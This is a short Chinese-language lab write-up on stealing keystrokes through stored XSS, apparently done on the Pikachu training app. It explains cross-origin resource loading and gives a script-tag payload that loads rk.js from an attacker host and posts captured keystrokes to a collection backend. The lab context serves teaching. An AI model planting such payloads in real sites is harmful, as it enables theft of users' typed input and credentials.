案例三:Xss获取键盘记录
先简单介绍一下跨域
跨域:http:// www . gxy.com :8080 / script/test.js
协议 子域名 主域名 端口 资源地址
当协议、主机、端口的任意一个不相同时,称不同域
将不同域之间的请求数据操作,称跨域操作
下面这些标签可以跨域加载资源
<script src=”…”>//js,加载到本地执行
<img src=”…”>//图片
<link href=”…”>//css
<iframe src=“…”>//任意资源
把rk.js 文件放到被攻击者的页面当中,通过获取键盘值,post发送给攻击者后台
利用:
存储型xss 留言板 输入 提交
<script src=" http://192.168.27.156/pikachu/pkxss/rkeypress/rk.js"> </script>
打开控制台的网络 在键盘上随便输入发现会跳出来 页面请求失败
但是这里这显示出错了,问题出在了event没有定义?
正确的应该显示这样
在pkxss后台我们就可以看到获取的信息